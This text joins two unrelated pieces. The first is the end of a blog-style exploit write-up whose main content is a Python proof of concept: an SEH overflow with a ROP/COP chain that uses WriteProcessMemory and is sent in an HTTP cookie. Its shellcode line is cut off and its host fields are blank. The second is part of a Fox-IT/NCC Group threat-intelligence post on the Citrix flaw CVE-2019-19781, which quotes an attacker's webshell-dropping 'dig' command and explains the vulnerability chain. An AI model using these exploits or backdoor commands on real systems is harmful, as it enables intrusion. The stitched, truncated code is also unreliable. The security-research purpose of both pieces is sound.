Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory is negative fffffd2d bytes away from kernel32!GetStartupInfoA (which is in the virtual parameter placeholder currently)
# Popping 0xfffffd2d into EBX (which will be transferred into EDX. After value is in EDX, it will be added to EAX via EDX)

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory from kernel32!GetStartupInfoA

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

# Writing kernel32!WriteProcessMemory address to kernel32!WriteProcessMemory parameter placeholder

# Gadget to overwrite kernel32!VirtualParameter placeholder will do so at an offset of ECX + 0x8. Compensating for that now
# First, decrementing ECX by 0x8
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# The goal now is to load the address pointing to kernel32!WriteProcessMemory in ESP
# ECX contains an address + 0x8 bytes behind the kernel32!WriteProcessMemory pointer on the stack
# Increasing ECX by 8 bytes, moving it into EAX, and then exchanging EAX with ESP to fire off the ROP chain!
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

# NOPs before shellcode
crash += "\x90" * 230

# calc.exe
# 195 bytes

crash += ("\x89\xe5\x83\xec\x20\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b"

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

iF wE dIsAbLe cAlC wE wIlL mItIgAtE aLl tHe zEro dAyS


Had to think outside the box with a few of the COP gadgets, but overall this was very fun! Hopefully this was informative and helped out anyone looking to stay away from VirtualProtect() or VirtualAlloc().

Peace, love, and positivity :-)

A Second Look at CVE-2019-19781 (Citrix NetScaler / ADC)

By: Fox IT
1 July 2020 at 03:50

Authors: Rich Warren of NCC Group FSAS & Yun Zheng Hu of Fox-IT, in close collaboration with Fox-IT’s RIFT.

About the Research and Intelligence Fusion Team (RIFT):

RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.


In this blog post we will revisit CVE-2019-19781, a Remote Code Execution vulnerability affecting Citrix NetScaler / ADC. We will explore how this issue has been widely abused by various actors and how a hacker turf war led to some actors “adversary patching” the vulnerability in order to prevent secondary compromise by competing adversaries – hiding the true number of vulnerable and compromised devices in the wild.

Following this, we will take a deep-dive into the vulnerability itself and present a previously unpublished technique which can be used to exploit CVE-2019-19781, without any vulnerable Perl file – bypassing the “adversary patching” techniques used by some attackers.

We will also provide statistics on exploitation, patching and backdoors we have identified in the wild.

Public Exploitation & Backdoors

Back in January 2020, shortly before the first public exploits for CVE-2019-19781 were released, Fox-IT built and deployed a number of honeypots in order to keep an eye on exploitation attempts by malicious actors. Additionally, we developed our own in-house exploit in order to study and understand the vulnerability, as well as to use it on our Red Team engagements.

On 10th January 2020, the first public exploits were released on GitHub. Shortly after this we started to see a significant uptick in both scanning and exploitation of the vulnerability. Most of the initial exploits weaponised by attackers came in the form of coin-miners, however a number of other “interesting” attacks were also observed within the first few days of exploitation. Typically, these involved a webshell being deployed to the compromised device.

This allowed us to collect a list of backdoors deployed by attackers, and subsequently develop signatures which could be used to identify backdoors as well as specific indicators of compromise. Following this, Fox-IT’s RIFT Team were able to gather statistics around patch adoption and backdoors deployed in the wild.

As an example, the following webshell was observed being dropped as part of a group of backdoors which we refer to as the “Iran Network Team” backdoors, first described in our Reddit live blog on January 13th 2020. It is important to note that although this particular actor used a C2 domain of we have not made any attribution to Iran or any other state actor. At the time however, this particular attacker stood out as distinct from many other attackers, who appeared to be focused on deploying coin-miners.

Instead, this attacker appeared to be concerned with gaining remote persistent access to as many systems as possible, deploying a number of PHP webshells using the Project Zero India public exploit. These webshells would be deployed by issuing a “dig” command such as the following:

exec('dig txt|tee /var/vpn/themes/login.php | tee /netscaler/portal/templates/REDACTED.xml');

This would fetch the webshell content via a TXT record hosted on the C2 domain. The content of which would be written to the following PHP file:

  • /var/vpn/themes/login.php

Variants were also observed, using the “logout.php” file instead, as well as staging payloads via Base64 encoded files named “readme.txt” and “read.txt”.

This PHP file was in fact a simple webshell, which did not require any authentication in order to interact with it, other than knowing the POST parameter name. According to our statistics, this attacker was largely successful in deploying their backdoor to a significant number of systems, many of which, although patched, are left vulnerable due to the password-less backdoor left open on their devices. This backdoor could be used not only by the original attacker, but also by any script-kiddie or state actor with knowledge of the webshell path and POST parameter name.

As well as backdoors, we were also able to identify specific exploitation artifacts. For example, when studying the “Iran Network Team” attacks, we noticed that the attacker would commonly stage secondary payloads within the public directory of the server, meaning that their presence could be easily detected.

Once the signatures for each backdoor variant were developed, analysis of the available data was carried out. This initially included 5 different known backdoors and artifacts and was done using data from late January 2020. This provided some interesting results, some of which are detailed below.

In January 2020 a total of 1030 compromised servers were identified. The majority of these compromised devices were situated in the US, with a total of 2057 backdoors and artifacts being identified. Many of these compromised devices included Governmental organizations and Fortune 500 companies. There appeared to be no specific sector that was targeted more than any other, however backdoors were observed on high-profile organisations from a number of industries including manufacturing, media, telecoms, healthcare, financial and technology.


Backdoors – Count by Country

However, of perhaps more concern was that, of these compromised devices, 54% had been patched against CVE-2019-19781, thus providing their administrators with a false sense of security. This is because although the devices were indeed patched, any backdoor installed by an attacker prior to this would not have been removed by simply installing the vendor’s patch.

Note that the Unknown hosts recorded below indicate hosts that did not respond with an expected HTTP request (e.g. a 403 or a 200)

Backdoored Servers – Patch Status

From Malware to Palware

Following the initial discovery of public exploitation of this vulnerability, the team at FireEye released their analysis of a new backdoor, named “NOTROBIN’, written in Golang.  What was different about this backdoor however, was that instead of deploying a coin-miner or a simple webshell, NOTROBIN would actually attempt to identify and remove any backdoors that had been installed prior to it, as well as attempt to block further exploitation by deleting new XML files or scripts that did not contain a per-infection secret key.

This marked a shift, at least for one actor, to a new type of infection, which DCSO eloquently described as “palware” – a seemingly innocent piece of malware with the primary goal of preventing other actors from deploying their own malware.

But was the actor behind NOTROBIN the only one to deploy this “palware” method? Possibly not. A number of anecdotal cases, as well as our own first-hand experience suggest that other attackers have also carried out “adversary patching” by deleting the vulnerable Perl scripts (such as from compromised devices, thus preventing other attackers from exploiting the same issue, whilst maintaining access for themselves.

Whether or not this is in fact a separate actor, or actually a quirk of NOTROBIN’s backdoor removal function however, is not so clear. As mentioned earlier, one of the features of NOTROBIN’s backdoor removal function (aptly named remove_bds), is to remove any file within the /netscaler/portal/scripts/directory which has been recently modified and does not contain NOTROBIN’s secret key within either the filename or the contents. Of course this would include any backdoor that had been dropped by a previous attacker, however if one of the built-in scripts such as had been modified, perhaps as the result of a backdoor being added, this would also result in the removal of that file by NOTROBIN. This means that not only that the backdoor would be removed, but that the entire script, and all its legitimate functionality would be wiped out with it.

We have also responded on incident response cases where the “vulnerable” Perl files such as have been renamed to contain the NOTROBIN key, e.g.:


Effectively making the vulnerability only exploitable by an actor with prior knowledge of the infection key.

As a result, there are hosts, which on the surface appear to be patched, however have in fact been compromised by a previous attacker, and the “vulnerable” Perl files removed or renamed.

During the remainder of this blog post, we will discuss the inner workings of the Citrix vulnerability and exploit. We will then demonstrate a new exploitation technique which would allow an attacker to bypass both NOTROBIN’s patching method, as well as enable exploitation of a device that has had the vulnerable Perl scripts removed.

Vulnerability Deep Dive

Before we get into the details of bypassing the “adversary patch”, we will spend some time refreshing ourselves with what the vulnerability was, and how it is exploited.

TL;DR Version

Essentially, exploitation of this issue can be broken down into two steps which we will discuss in detail later. A short summary is given below:

  • Step 1: An HTTP request is made to a “vulnerable” Perl file. The attacker may or may not need to use directory traversal within the URL in order to access the Perl file, depending on whether the request is being made to a management or virtual IP interface. An HTTP header is supplied containing a directory traversal string to an XML file, which is to be written to disk. Note: A “vulnerable” Perl file is considered to be any Perl file which calls the `UserPrefs::csd` function followed by the `UserPrefs::filewrite` This is important, and typical of all public exploits.
  • Step 2: A follow-up HTTP request is then made, causing the crafted XML file to be rendered by the template engine, resulting in arbitrary code-execution.

Of course, we’ve skipped some steps here to simplify things, but the important thing to remember is the following limitations of this exploitation method:

  1. A “vulnerable” Perl file must exist on the system (which is certainly the case by default, however another attacker or a well-meaning administrator may have removed it)
  2. Two HTTP requests are required in order to achieve code execution.

Detailed Exploitation Steps

In order to fully understand the steps detailed above, let’s look at how the vulnerability works in detail, and explain why these steps are necessary. This should help us later to understand how to bypass the limitations.

If you are already familiar with the inner workings of the exploit you can skip over this next section.

For a good background on exploitation of this issue, please check out the MDSec blog post, which explains in great detail the vulnerability and exploitation steps. However for the sake of completeness (and to highlight a few specific things) we will explain it here too.

The CVE-2019-19781 “vulnerability” is in fact the CVE used to record the mitigation steps for a number of vulnerabilities which could be exploited together to achieve unauthenticated remote code execution. Citrix later released a patch to remediate the majority of these vulnerabilities used as part of the exploit chain.

Directory Traversal

The first of the vulnerabilities was a path canonicalisation issue which allowed requests to the Virtual IP (VIP) interface to bypass certain access control measures, if the request contained a directory traversal string. This essentially allowed an unauthenticated user to invoke Perl scripts which were not intended to be exposed via the public interface. This included Perl scripts within the /vpns/portal/scripts/directory, thus exposing any underlying vulnerabilities which might exist within the Perl scripts contained in this directory.

So, now the attacker is able to access certain Perl scripts within the “scripts” directory. However, another vulnerability is needed to turn that unintended access into arbitrary file write, and eventual code execution.

Controlled File Write

The next issue, a partially controlled file-write, existed within the module. Specifically, within the csd function, which takes the value of the NSC_USER header supplied within the request and sets it as the $username variable. This username value is then later used to build the $self-&gt;{filename} instance variable without any form of sanitisation on the supplied value.

As shown in the following screenshots, the username value is taken directly from the HTTP header, before being concatenated with some predefined values to form the filename variable.

csd Function


User-controlled Filename

However, this alone does not lead to an exploitable condition. All it does is set a variable. We need to cause this value to be used for something useful. Given the name of the filename variable, we can make a pretty good guess at what it’s used for, and lo-and-behold there is indeed a function named file<strong>write, also contained within the module.

filewrite Function

This function takes the username value, and again uses it to build a path to write out an XML file to the filesystem (note that it reconstructs the path from username again). The contents of this file are controlled via the $doc variable, which depending on when it is called, contains various user-controlled data.

